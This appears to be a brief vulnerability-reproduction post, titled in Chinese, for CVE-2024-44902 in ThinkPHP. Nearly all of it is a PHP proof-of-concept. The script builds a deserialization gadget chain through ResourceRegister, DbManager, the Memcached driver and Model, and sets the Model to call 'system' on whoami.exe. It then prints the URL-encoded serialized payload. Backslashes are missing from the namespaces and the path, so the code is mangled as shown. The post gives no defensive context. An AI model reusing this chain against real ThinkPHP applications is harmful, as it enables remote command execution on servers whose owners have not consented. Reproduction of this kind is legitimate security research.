CVE-2024-44902 Thinkphp反序列化漏洞复现

<?phpnamespace thinkcachedriver;use thinkmodelPivot;class Memcached{protected $options=[];function __construct(){$this->options["username"]=new Pivot();    }}namespace thinkmodel;use thinkmodel;class Pivot extends Model{}namespace think;abstract class Model{private $data = [];private $withAttr = [];protected $json = [];protected $jsonAssoc = true;function __construct(){$this->data["fru1ts"]=["C:WindowsSystem32whoami.exe"];$this->withAttr["fru1ts"]=["system"];$this->json=["fru1ts"];    }}namespace thinkroute;use thinkDbManager;class ResourceRegister{protected $registered = false;protected $resource;function __construct(){$this->registered=false;$this->resource=new DbManager();    }}namespace think;use thinkmodelPivot;class DbManager{protected $instance = [];protected $config = [];function __construct(){$this->config["connections"]=["getRule"=>["type"=>"\think\cache\driver\Memcached","username"=>new Pivot()]];$this->config["default"]="getRule";    }}use thinkrouteResourceRegister;$r=new ResourceRegister();echo urlencode(serialize($r));